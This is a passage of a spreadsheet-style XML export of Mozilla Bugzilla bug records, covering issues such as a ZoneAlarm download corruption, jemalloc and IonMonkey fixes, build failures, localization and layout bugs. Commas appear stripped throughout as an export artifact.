webpage domain as well as the MP3 file download domain has no effect. If
ZoneAlarm is running I cannot download MP3 files successfully with Firefox.
Firefox WILL download the MP3 file undamaged IF I {right click}/Save Link As
on the webpage wait 15 seconds and then click the Save button in the Windows
filename dialog box.
In both Firefox and IE6 when I {right click}/Save ... As on the MP3 webpage
link a TCP connection is opened to the actual MP3 file server. If I click
Save and download the MP3 file while this initial TCP connection is open the
file downloaded by Firefox is corrupt. If I wait until the initial TCP
connection terminates/closes and THEN click Save in the Windows filename
dialog box the MP3 file downloads successfully. That first/initial connection
terminates/closes if the Save button is not selected within 15 seconds. If the
first/initial TCP connection is allowed to timeout and close a new TCP
connection is established when the Save button in the Windows filename dialog
box is selected. The MP3 file then successfully downloads with all information
intact.
When ZoneAlarm is down both Firefox and IE6 download MP3 files successfully. In
addition their File Download Progress Bars accurately reflects file size and
progress of the file being downloaded. With ZoneAlarm up the File Download
Progress Bars display Unknown for the file size and show a generic download
progress bar.
Increasing the maximum number of connections available in Firefox had no effect
on download success. Setting the MAX CONNECTIONS=50 MAX CONNECTIONS PER
SERVER=16 MAX PERSISTENT CONNECTIONS PER SERVER=20 and MAX PERSISTENT
CONNECTIONS PER PROXY=8 had no effect on download success.
Disabling all ZoneAlarm Firewall EXPERT RULES had no effect either and no other
ZoneAlarm PROGRAM RULES were enabled.
Windows XP SP2
IE Ver 5.1.2600.2180/SP2
Firefox Ver 1.0.1
ZoneAlarm Pro Ver 5.5.062.011
Reproducible: Always
Steps to Reproduce:
1. {right click/Save Link As} on MP3 file name
2. Immediately Left click Save button on Windows filename download dialog box.
3. View MP3 file information MP3 file and file information is corrupt. File
will not play.
Actual Results:  
With ZoneAlarm up/running and using Firefox's {right click}/Save Link As
option the MP3 file downloaded is corrupted. The file will not play properly
the file size is incorrect and the MPEG file information (Artist Album Name
etc) is truncated. File size is incorrect for file downloaded.
Expected Results:  
MP3 file should download intact with accurate file size.</t>
  </si>
  <si>
    <t>JELittleton</t>
  </si>
  <si>
    <t>CORE-431743</t>
  </si>
  <si>
    <t>Memory Allocator</t>
  </si>
  <si>
    <t>Upstream jemalloc fixes</t>
  </si>
  <si>
    <t>malloc() uses unsigned integers to represent allocation size but sbrk() uses a signed increment argument thus limiting the maximum allocation size possible via sbrk().  Since sbrk() interprets a negative increment as a data storage segment (DSS) shrink failing to detect this overflow case can cause crashes.</t>
  </si>
  <si>
    <t>jasone</t>
  </si>
  <si>
    <t>CORE-404666</t>
  </si>
  <si>
    <t xml:space="preserve">[FIX]ASSERTION: How did that happen?? removing </t>
  </si>
  <si>
    <t>Created attachment 289577
testcase
Loading the testcase triggers:
###!!! ASSERTION: How did that happen??: 'col-&gt;GetStyleContext() == colFrame-&gt;GetStyleContext() &amp;&amp; col-&gt;GetContent() == colFrame-&gt;GetContent()' file /Users/jruderman/trunk/mozilla/layout/tables/nsTableColGroupFrame.cpp line 340
(Previous bugs triggering this assertion: bug 404301 bug 403249.)</t>
  </si>
  <si>
    <t>FIREFOX-266924</t>
  </si>
  <si>
    <t>Hungarian l10n update: throbber URL</t>
  </si>
  <si>
    <t>Hungarian browser-region/region.properties has been updated according to
https://bugzilla.mozilla.org/show_bug.cgi?id=266530. Please approve.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-300183</t>
  </si>
  <si>
    <t>Cannot attach the web page that its URL is encoded by non-UTF-8 URL encode</t>
  </si>
  <si>
    <t>If an URL is encoded by URL encode that is not encoded with UTF-8 we cannot
attach the URL to mail.</t>
  </si>
  <si>
    <t>FIREFOX-393244</t>
  </si>
  <si>
    <t>occasionally hitting enter in the url bar will not have an effect</t>
  </si>
  <si>
    <t>occasionally hitting enter in the url bar will not have an effect.
I have run into this issue before and I thought I had addressed it (see bug #389593 comment #14).
but I just hit it again when typing g test and hitting enter.  (in my profile g is a keyword search for http://www.google.com/search?hl=en&amp;q=%s)
what's going on is we call EnterMatch() and our status is nsIAutoCompleteController::STATUS_SEARCHING we will bail out and handle the enter the next time we process a result.
the next time we get into ProcessResult() if enter was hit and searches are ongoing we will stop the searches and then call PostSearchCleanup() which will then handle the enter.
using the almighty printf I can see that when this happens we never call ProcessResult() after EnterMatch() so we will never call PostSearchCleanup() which will call EnterMatch() again.
I believe the reason this is happening is that the search timer has been cleared and so it will not fire and call StartSearch()
note this is a regression due to bug #389593.</t>
  </si>
  <si>
    <t>TOOLKIT-492249</t>
  </si>
  <si>
    <t>Column sort indicator in RTL tree header appears on the right side</t>
  </si>
  <si>
    <t>The column sort indicator in RTL tree headers appears on the right side but it should appear on the left side instead.
I looked into NS_THEME_TREEVIEW_HEADER_CELL drawing in nsNativeThemeCocoa.mm but couldn't figure out how to change it in order to draw on the other side of the header...</t>
  </si>
  <si>
    <t>CORE-108775</t>
  </si>
  <si>
    <t>persist is being broadcast</t>
  </si>
  <si>
    <t>The persist attribute is being broadcast and it should never be broadcast. 
This was broken during the whole XULElement attribute cleanup.  
This bug is critical for 0.9.6 since it will cause permanent corruption in the
localstore.rdf file which will prevent you from ever getting column headers
back in a tree widget.</t>
  </si>
  <si>
    <t>TOOLKIT-385677</t>
  </si>
  <si>
    <t>Breakpad code fails to build using GCC-4.3 snapshot</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a6pre) Gecko/20070620 SeaMonkey/2.0a1pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a6pre) Gecko/20070620 SeaMonkey/2.0a1pre
Hi.
The development GCC-4.3 compiler implicitly includes many fewer header files than previous GCC versions so code that builds under GCC-4.2 or earlier may not build. The new airbag code utilizes various system functions and constants without explicitly included in the necessary files so while the files compile in older GCC releases building with GCC-4.3 fails. In addition to missing several necessary '#include' statements the airbag code also has an extra semi-colon character in the code which GCC-4.3 rejects when the '-pedantic' flag is used.
Reproducible: Always
Steps to Reproduce:
1. Install GCC-4.3 snapshot
2. Configure a SeaMonkey build.
3. Start build and watch the fun.
Actual Results:  
Build fails.
Expected Results:  
Build succeeds.
I'll submit a patch adding the necessary header file '#include' statements once this bug report is complete. The code then compile _however_ there are linkage issues with the new airbag code when building with GCC-4.2 or newer that still need to be resolved.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-383744</t>
  </si>
  <si>
    <t>Load testing for crash reporting system</t>
  </si>
  <si>
    <t>We need to start load testing the crash reporting setup.  The two pieces we'd like to test are the collector and the reporter (web apps).
Page to discuss:
http://wiki.mozilla.org/Breakpad/Design/Loadtesting
We are not sure what our expected req/s is so it'd likely be finding the limits of the applications and deciding.  I talked about this on the wiki page.
Aravind -- is there a good time we can set up to do some preliminary load testing?  We'd need someone to watch and log app and db load during tests.</t>
  </si>
  <si>
    <t>BUGZILLA-356924</t>
  </si>
  <si>
    <t>Remove the old bug_email inbound email interface</t>
  </si>
  <si>
    <t>Now that we have email_in.pl we don't need the old contrib/bug_email stuff anymore so it can be removed.
This bug just needs approval. The files I'll delete are:
contrib/bug_email.pl
contrib/bugmail_help.html
contrib/bugzilla_email_append.pl
contrib/BugzillaEmail.pm</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-279395</t>
  </si>
  <si>
    <t>gspairport.com - This site cannot be viewed with Firefox but can be viewed with IE</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
This site cannot be viewed with Firefox but can be viewed with IE
Reproducible: Always</t>
  </si>
  <si>
    <t>paramis10</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID-953272</t>
  </si>
  <si>
    <t>Prompt.jsm: Using setMultiChoiceItems causes button to always return false regardless of the button</t>
  </si>
  <si>
    <t>I'm using this code:
  var p = new Prompt({
    title: Enter your username and password
    buttons: [Add Remove]
  })
  var items = [{label: FOO}]
  p = p.setMultiChoiceItems(items)
  p.show(function(data) {
    Services.prompt.alert(null  JSON.stringify(data))
  })
Whether I click on Add or Remove the data has button: [false]
If I remove the setMultiChoiceItems I get the correct data for the button.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-174248</t>
  </si>
  <si>
    <t>www.instytut.org.pl uses document.all and window.event</t>
  </si>
  <si>
    <t>Horizontal menu doesn't work. Layout is messed up there is a huge white space
just below the menu. The page uses document.all and window.event.</t>
  </si>
  <si>
    <t>gabrielbaines</t>
  </si>
  <si>
    <t>CORE-98595</t>
  </si>
  <si>
    <t>Ability to disable lists trees completely</t>
  </si>
  <si>
    <t>Ability to disable a complete tree instead of looping through each cell and
element in it.</t>
  </si>
  <si>
    <t>vparthas</t>
  </si>
  <si>
    <t>THUNDERBIRD-392764</t>
  </si>
  <si>
    <t>packages-static cleanup August 2007 edition</t>
  </si>
  <si>
    <t>Created attachment 277269
Fix v.1
Though as often as things get abandoned there maybe I should summarize by week number...
- mail-locales.manifest was orphaned by bug 245430 and removed by bug 386909
- progressDlg.xpt got the ax somewhere in Fx3's handling stuff I didn't look up where because it was easier to ask biesi if it was intentional and permanent
- webservices and SVG we don't build by default and I can't believe how long it took me to realize packages-static is preprocessed so we don't have to fill the tinderbox build logs with bogus Warning: package error... messages for them.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-348447</t>
  </si>
  <si>
    <t>feed sanitizer whitelist accessibility and i18n.</t>
  </si>
  <si>
    <t>need to go into gkAtoms and the list in nsContentSink.h.</t>
  </si>
  <si>
    <t>CORE-410761</t>
  </si>
  <si>
    <t>Set filters as supported features</t>
  </si>
  <si>
    <t>Created attachment 295349
patch
All 1.1 filters are done now that we have feImage and feDisplacment map so mark filters as supported features.</t>
  </si>
  <si>
    <t>CORE-432967</t>
  </si>
  <si>
    <t>WARNING: NS_ENSURE_TRUE(aContent) failed: file nsAccessibilityUtils.cpp line 262</t>
  </si>
  <si>
    <t>Stack is
=&gt;[1] nsAccUtils::HasListener(aContent = (nil) aEventType = CLASS) line 262 in nsAccessibilityUtils.cpp
  [2] nsAccessible::GetNumActions(this = 0xef216600 aNumActions = 0x8045c3d ) line 2670 in nsAccessible.cpp
  [3] nsAccessibleWrap::CreateMaiInterfaces(this = 0xef216600) line 426 in nsAccessibleWrap.cpp
  [4] nsAccessibleWrap::GetNativeInterface(this = 0xef216600 aOutAccessible = 0x8045c9c) line 379 in nsAccessibleWrap.cpp
We should not call nsAccUtils::IsXLink() and nsAccUtils::HasListener() is content is null in nsAccessible::GetNumActions()
mDOMNode is nsHTMLDocument</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-509381</t>
  </si>
  <si>
    <t>[Tracking bug] bugs found with the tile merge</t>
  </si>
  <si>
    <t>21</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-510320</t>
  </si>
  <si>
    <t>Check for L10n support with verification suite</t>
  </si>
  <si>
    <t>From the blog:
may I suggest a test to check for hardcoded user interface strings?
Or more simply a detection of the absence of locale support triggering something like â€œIt seems your extension has no locale support. Though it is no big issue it is recommended to have at least one en-US locale subfolder for your user interface stringsâ€
(and a link to appropriate documentation)
and some follow up example code:
[code]function check_locale_support() {
$fileContents = file('chrome.manifest')
    foreach ($fileContents as $line) {
                // convert tabs into space and trim the string
        $line = trim(str_replace(chr(9) $line))
        if (strpos($line locale) === 0) return true
    }
    return false
}[/code]
-----------------------------------------
one of my concerns with this is that not all add-ons need L10n support (I have one with no UI).  It would be cool if we could only show the warning for add-ons that hardcode strings but I'm not sure how we would detect that.</t>
  </si>
  <si>
    <t>rjbuild1088</t>
  </si>
  <si>
    <t>CORE-511322</t>
  </si>
  <si>
    <t>Clean-up about:license block for netwerk/wifi/ code</t>
  </si>
  <si>
    <t>Not sure why the patch in bug 479898 modified toolkit/content/license.html without gerv's review but it wasn't done correctly at all. The license block for the wifi code was added at the end of the file outside of alphabetical order not added to the list at the top and generally just not done correctly.
Also this doesn't make sense:
This license applies to files in the following directories with the specified copyright year ranges:
    * netwerk/wifi/ 2009
Copyright 2008 Google Inc.
Also what about the extra zero here?
Copyright (c) 02006 Alf Watt (alf@istumbler.net). All
rights reserved.</t>
  </si>
  <si>
    <t>CORE-521207</t>
  </si>
  <si>
    <t>SVG feTile fails if filter size is twice the size of the source</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de-de) AppleWebKit/531.2+ (KHTML like Gecko) Safari/531.2+
Build Identifier: 
SVG feTile fails if filter size is twice the size of the source. The tile isn't visible at all. (Maybe it's drawn on the wrong place at x=-50% y=50%)
Reproducible: Always
Steps to Reproduce:
open the link
Actual Results:  
You won't see anything on the first rect.
Expected Results:  
The right rect should be fully filled by the gradient</t>
  </si>
  <si>
    <t>krit</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-418177</t>
  </si>
  <si>
    <t>abc encoding enhancements</t>
  </si>
  <si>
    <t>Created attachment 303967
encode abc to cpp fix abc-encode verbose mode
I'm attaching a patch which provides a couple of enhancements to the abc encoding of ESC:
* A new tool which encodes a .abc file as .cpp/.h files as currently done by the ASC compiler suitable for generating the shell's toplevel.cpp/toplevel.h and ScreamingMonkey's equivalent.
* Fixes to make 'abcencode.sh verbose filename' work - it breaks because it throws away the constant pool values on reading them so 'verbose' can't access the values.
This has been done by:
* Creating a new file abc-parse.es which includes the parsing logic from abc.es and also the 'constant pool' parsing code of abc-encode.es.  This was done after Lars suggested the refactoring of the parsing code into a new module and so the .cpp encoder can reuse this pool parsing.
* Modifying abc-encode.es to use the shared constant-pool parser particularly in verbose mode.
* New source file and shell script for the .cpp encoder other tweaks to shell files to reference the new abc-parser.
Note the new .cpp encoder appears to work well and the output matches that of asc when run against the 2 toplevel .abc files in the source distro.  The order of the constants in the .h file do not match though but this is not a problem.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-849612</t>
  </si>
  <si>
    <t>Fix build problems caused by Bug 847195 [error: nsIDOMNamedNodeMap.h: No such file or directory]</t>
  </si>
  <si>
    <t>It looks like Bug 847195 removed the nsIDOMNamedNodeMap class due to that build failure(s?) occur from SeaMonkey build log:
[...]
/builds/slave/c-cen-t-lnx-ntly/build/mailnews/compose/src/nsMsgCompose.cpp:17:32: fatal error: nsIDOMNamedNodeMap.h: No such file or directory
[...]</t>
  </si>
  <si>
    <t>CORE-503269</t>
  </si>
  <si>
    <t>Alt text in right-to-left languages can appear backwards</t>
  </si>
  <si>
    <t>Created attachment 387609
testcase minimized and anonymized from flickr.com
I see this on Flickr when the thumbnails in the Updates from your contacts are slow to load.
The issue is the same as bug 370589: the alt text is not part of the DOM so the Bidi enabled flag isn't set in the presContext if there is no other right-to-left text in the page.</t>
  </si>
  <si>
    <t>CORE-814396</t>
  </si>
  <si>
    <t>IonMonkey: CharCodeAt continues to use input after ool VM call</t>
  </si>
  <si>
    <t>Code generated for CharCodeAt may perform an OOL call to linearize a rope input and continue to use its input registers after the call returns.  Similar to bug 814177 this seems to work with the LSRA allocator but may break on other allocators that do not mark the inputs as live registers after the instruction.</t>
  </si>
  <si>
    <t>WEBTOOLS-924631</t>
  </si>
  <si>
    <t>DXR</t>
  </si>
  <si>
    <t>DXR mozilla-central build failing</t>
  </si>
  <si>
    <t>Build process is saying this:
Worker working on files 18001-18500 failed.
Traceback (most recent call last):
  File dxr/bin/dxr-build.py line 56 in 
    main()
  File dxr/bin/dxr-build.py line 52 in main
    verbose=options.verbose)
  File /data/builds/mock_mozilla/mozilla-central/targetdata/dxr-build-env/dxr-venv/lib/python2.7/site-packages/dxr-0.1-py2.7.egg/dxr/build.py line 154 in build_instance
    run_html_workers(tree conn)
  File /data/builds/mock_mozilla/mozilla-central/targetdata/dxr-build-env/dxr-venv/lib/python2.7/site-packages/dxr-0.1-py2.7.egg/dxr/build.py line 428 in run_html_workers
    start end = future.result()  # raises exc if failed
  File /data/builds/mock_mozilla/mozilla-central/targetdata/dxr-build-env/dxr-venv/lib/python2.7/site-packages/concurrent/futures/_base.py line 397 in result
    return self.__get_result()
  File /data/builds/mock_mozilla/mozilla-central/targetdata/dxr-build-env/dxr-venv/lib/python2.7/site-packages/concurrent/futures/_base.py line 356 in __get_result
    raise self._exception
IndexError: string index out of range
Trying to repro it locally.</t>
  </si>
  <si>
    <t>CORE-75169</t>
  </si>
  <si>
    <t>[API] strings do not compile cleanly on Win32</t>
  </si>
  <si>
    <t>I'm seeing the following warnings when compiling nsLineBox.cpp. I'm frightened. 
I suspect that some of the classes in the string library need to be declared 
__declspec(dllexport) but am not really sure.
nsLineBox.cpp
..\..\..\..\dist\include\nsLocalString.h(80) : warning C4251: 'mHandle' : 
class 'nsBufferHandle' needs to have dll-interface to be used 
by clients of class 'nsLocalString'
..\..\..\..\dist\include\nsLocalString.h(120) : warning C4251: 'mHandle' : 
class 'nsBufferHandle' needs to have dll-interface to be used by clients 
of class 'nsLocalCString'
..\..\..\..\dist\include\nsCommonString.h(69) : warning C4251: 'mBuffer' : 
class 'nsAutoBufferHandle' needs to have dll-interface to be 
used by clients of class 'nsCommonString'
..\..\..\..\dist\include\nsCommonString.h(98) : warning C4251: 'mBuffer' : 
class 'nsAutoBufferHandle' needs to have dll-interface to be used by 
clients of class 'nsCommonCString'</t>
  </si>
  <si>
    <t>CORE-288848</t>
  </si>
  <si>
    <t>Various memory leaks in nsAccessibleHyperText</t>
  </si>
  <si>
    <t>The ElementAt method of nsISupportsArray addrefs the element before returning
the pointer.  Therefore the following methods leak (or probably leak unless the
constructors of the accessible objects expect an already-addrefed pointer coming
in for some reason):
nsAccessibleHyperText::FindTextNodeByOffset
nsAccessibleHyperText::GetCaretOffset
nsAccessibleHyperText::GetCharacterCount
nsAccessibleHyperText::GetSelectionCount
nsAccessibleHyperText::GetText
nsAccessibleHyperText::GetBounds
Note that some code in the same file does correctly use do_QueryElementAt...
Also note that mTextChildren may just want to be an nsCOMArray --
that would make things simpler in most of this code.</t>
  </si>
  <si>
    <t>SEAMONKEY-119000</t>
  </si>
  <si>
    <t>Disabled Document/More in site navigation bar (links bar) use bookmark icon in Classic</t>
  </si>
  <si>
    <t>As seen in the testcase when the Document and More folders are disabled they
use a disabled bookmark icon instead of a disabled folder icon.
2002-01-06-08 Win98</t>
  </si>
  <si>
    <t>sballard</t>
  </si>
  <si>
    <t>gregvalure</t>
  </si>
  <si>
    <t>CORE-339371</t>
  </si>
  <si>
    <t>Need [NSApp run] on the stack</t>
  </si>
  <si>
    <t>When we're running under Cocoa we should make sure to run with [NSApp run] beneath us on the stack.  Josh and I are seeing weird crashes otherwise.  Testcase: attempt to log in to an https site that uses http authentication.</t>
  </si>
  <si>
    <t>CALENDAR-193388</t>
  </si>
  <si>
    <t>Edit Event dialog shows incorrect End Date and Time values</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3b) Gecko/20030210
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3b) Gecko/20030210
When editing an EXISTING event which spans more than one day the pop-up edit
event dialog initializes the End date to the same as the Start Date and the End
Time to 1 hour past the Start time (like defaults for a NEW event?).
Calendar Version: Mozilla Calendar 2003021311-cal 
Reproducible: Always
Steps to Reproduce:
1. Create an event spanning 2 or more days. Start 9am End 5pm 
2. Select event
3. Select Edit Selected Event
Actual Results:  
Edit Event Dialog pops up but the End Date has been set to the Start Date and
the End Time is one hour after the Start Time.
Expected Results:  
The End Date and Time should be shown as originally entered.</t>
  </si>
  <si>
    <t>ACannell</t>
  </si>
  <si>
    <t>FIREFOX-320482</t>
  </si>
  <si>
    <t>disable old bookmarks code</t>
  </si>
  <si>
    <t>There are conflicts in a static build with the old and new bookmarks code and we don't need the old code for anything so we should disable it.  We need to keep exporting the headers for now because the profile migrators haven't been converted yet.</t>
  </si>
  <si>
    <t>SEAMONKEY-246405</t>
  </si>
  <si>
    <t>mail_help.xhtml should be split to several files</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 he-IL rv:1.6) Gecko/20040113
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 he-IL rv:1.6) Gecko/20040113
currently the help file for the mail-news mail_help.xhtml is the largest file
in the help system totaling at 203000 lines and 182kB. for comparison the
second largest file composer_help.html is just over half of that.
most localizers of mozilla agree i believe that the size of this file poses a
problem:
1. any change in the file renders the entire file as invalid for inclusion in
the next language pack until the changes are updated in the translation
leaving it with no translated help at all for mail. because of the large amounts
of text in the help system many language packs don't include a complete
translation of the help. if this file was split in 3-4 parts at least some of
them could be entered to the pack if the localizer didn't make it to update the
change in time for the release or didn't translate the whole file for some
other reason.
2. load time: on my AMD 600MHz WinXP with 256MB 100MHz SDRAM it takes this
file 2-3 seconds to load. i think this is unacceptable for a local file.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
i hope i'm posting to the right component here. sorry if i'm wrong.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-505274</t>
  </si>
  <si>
    <t>memory-profiler-server does not work on non-Mac platforms.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 XPCOMViewer/0.9a
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 XPCOMViewer/0.9a
memory-profiler-server.html throws
Cc['@labs.mozilla.com/jsweakrefdi1'] is undefined
grep -R jsweak * shows 5 refrences 1 in the component source 3 in the extension and 1 in binary..
extension/platform/Darwin_x86-gcc3/components/libjetpack.dylib
missing the component build for Linux and Windows.
Reproducible: Always
Steps to Reproduce:
load chrome://jetpack/content/memory-profiler-server.html
Actual Results:  
throws exception
Cc['@labs.mozilla.com/jsweakrefdi1'] is undefined on line 29 in memory-profiler-server.html
Expected Results:  
Page loads and server can be started</t>
  </si>
  <si>
    <t>morganrallen</t>
  </si>
  <si>
    <t>BUGZILLA-158974</t>
  </si>
  <si>
    <t>review: relogin.cgi should use a template Patch v.2</t>
  </si>
  <si>
    <t>Gervase Markham  has requested review for bug #158658:
relogin.cgi should use a template attachment #92457: Patch v.2.
http://bugzilla.mozilla.org/attachment.cgi?id=92457&amp;action=edit
Additional Comments from Requester:
Second time lucky :-)
Gerv</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS_GRAVEYARD-724226</t>
  </si>
  <si>
    <t>Clone path is broken!</t>
  </si>
  <si>
    <t>Clone the localization repository for your locale and for the version you want to patch:
hg clone http://hg.mozilla.org/releases/l10n/mozilla-aurora/gl/
Visually there is space betweet 'mozilla-aurora and gl
Doc: https://developer.mozilla.org/en/Patching_a_Localization</t>
  </si>
  <si>
    <t>hitmanarky</t>
  </si>
  <si>
    <t>THUNDERBIRD-327600</t>
  </si>
  <si>
    <t>quick searching for sender in sent mail and drafts folder actually searches for recipient</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Version 1.5 (20051201)
I would like to search all mails in my local sent mail folder for mails which I have sent with a certain sender address say me@account1domain.com.
When using the search bar in the folder view I select Sender and enter the above address.
Instead of searching the From field (sender) of the mails obviously the To field (recipient) is searched.
Although this is minor there seems to be no workaround for me.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>marian</t>
  </si>
  <si>
    <t>CORE-93171</t>
  </si>
  <si>
    <t>Convert popupanchor and popupalign to position</t>
  </si>
  <si>
    <t>Replace popupanchor and popupalign with position on  and  
elements.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-90452</t>
  </si>
  <si>
    <t>threading by subject slow when threads are large</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.2+)
Gecko/20010711
BuildID:    2001071104
I upgraded to 2001071104 build and
when I click on one of the POP3 account folder it pops up a dialog showing:
Do you wish to compact all local and offline folders because the total wasted
space in all accounts exceeds the purge threshhold?
I answered Ok and all the CPU time are grabed by Mozilla.
I waited for quite a long time and Mozilla disappear from Windows
Alt-tab (task switching) windows but remains only in task manager
BTWWhat is the wasted space and purge thershold?
Reproducible: Always
Steps to Reproduce:
As described in description
Actual Results:  Mozilla Hang
Expected Results:  Mozilla completed the compaction using normal CPU time.</t>
  </si>
  <si>
    <t>wkfx2003-bugzilla</t>
  </si>
  <si>
    <t>CALENDAR-293390</t>
  </si>
  <si>
    <t>layout issues on date/time picker to use system colors and clean up layout</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050424 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050424 Firefox/1.0+
The date/time pickers were using non-system defined colors in their css which
needs to be fixed before landing in toolkit. Some text on the time picker wasn't
being centered.
Reproducible: Always</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-559088</t>
  </si>
  <si>
    <t>Port |Bug 518641 - make package-tests doesn't work right on OS X universal builds| to comm-1.9.1</t>
  </si>
  <si>
    <t>Port bug 526817 patch Bv1 too.
See discussion in bug 526817.</t>
  </si>
  <si>
    <t>CORE-212346</t>
  </si>
  <si>
    <t>nsCSSFrameConstructor.cpp:4182: warning: unused variable `class nsIView * listView'</t>
  </si>
  <si>
    <t>(--disable-debug)</t>
  </si>
  <si>
    <t>CORE-96469</t>
  </si>
  <si>
    <t>500 GetService(xbl service) on startup</t>
  </si>
  <si>
    <t>Mainly from the nsCSSFrameConstructor and nsXULElement.</t>
  </si>
  <si>
    <t>FIREFOX-329337</t>
  </si>
  <si>
    <t>Bookmarks and Open in Tabs don't work in Bookmarks Menu but do from Places Toolbar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060304 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060304 Firefox/1.6a1
Simple to see. Build or get a very recent nightly build.
Try to use open in tabs from bookmarks menu
Reproducible: Always
Steps to Reproduce:
1.See details
2.
3.
Actual Results:  
Nothing happens
Expected Results:  
opening choosen bookmarks.
Related to bug 329266 ?!</t>
  </si>
  <si>
    <t>TOOLKIT-358079</t>
  </si>
  <si>
    <t>Proper l10n for crash reporter client</t>
  </si>
  <si>
    <t>We'll need to move crashreporter.ini into toolkit/locale and whatever other build-fu is necessary to make the crashreporter client fully localizable.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-185959</t>
  </si>
  <si>
    <t>Many function(For exam. Reply Forward) works and leads to crash before user login</t>
  </si>
  <si>
    <t>The function of Reply Forward to a message should not work before user enter
password and login. But They are working in Mozilla 1.2 and leads to crash.
Steps to reproduce for Reply:
1. Start an IMAP account and select its any folder to try to login cancel the
password dialog.
2. Select a message in a folder('INBOX' or another) cancel the password dialog.
3. You can see the Reply Reply All Forward button freshed and can work now.
4. Select Reply button.
5. The reply window will jump out with the 'To:' editbox null. Press at the
'To:' to try to add an address.
6. Crash.
Actual Results: crash 
Expected Results:  no crash</t>
  </si>
  <si>
    <t>BUGZILLA-147138</t>
  </si>
  <si>
    <t>Section on upgrading needs improving.</t>
  </si>
  <si>
    <t>The section of the Bugzilla Guide on upgrading Bugzilla needs a bit of
improving.  It assumes you're upgrading using CVS.  It should also include
instructions about cp and tarballs.
Make sure everything in the release notes upgrading seciton is also included here.
It should probably be moved into its own section before template customisation
since that section needs to talk about upgrading.</t>
  </si>
  <si>
    <t>CORE-528447</t>
  </si>
  <si>
    <t>get rid of FSRef usage in nsDirEnumerator</t>
  </si>
  <si>
    <t>Created attachment 412173
fix v1.0
We should get rid of FSRef usage in nsDirEnumerator. This work started in bug 506812 but was never finished due to test failures. I'm moving it to its own bug.
Makefile:327: test_bug419132.html disabled because it takes 60 seconds
Makefile:327: bug419132.html disabled because it takes 60 seconds
Running XMLHttpRequest tests...
NEXT ERROR TEST-UNEXPECTED-FAIL | Couldn't create nsIXMLHttpRequest instance!
Finished running XMLHttpRequest tests.
make[3]: *** [check] Error 1
make[4]: Nothing to be done for `check'.
make[2]: *** [check] Error 2
make[1]: *** [check] Error 2
make: *** [check] Error 2
program finished with exit code 2</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-397212</t>
  </si>
  <si>
    <t>setuid on handlemail.pl and processbuild.pl fails on newer versions of Linux</t>
  </si>
  <si>
    <t>On newer versions of Linux (i.e. RHEL 5 and newer) doing a chown on a file will nuke any existing setuid bits in the filemode as a security precaution.
The install section of the Makefile for tinderbox does a chown -R $TINDERBOX_USER *after* it does the chmod 4775 on handlemail.pl and processbuild.pl thus nuking the setuid bit that it just turned on.  The chmod 4775 needs to happen after the chowns do.</t>
  </si>
  <si>
    <t>CORE-195732</t>
  </si>
  <si>
    <t>Table height of 100% ignored when table inside a form</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 .NET CLR 1.0.3705)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2.1) Gecko/20021130
The example URL shows the incorrect behaviour and has a link to the same page 
with the form commented out in which case the page displays fine.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-236903</t>
  </si>
  <si>
    <t>XP filepicker totally broken (no save as save image file input etc)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7b) Gecko/20040309
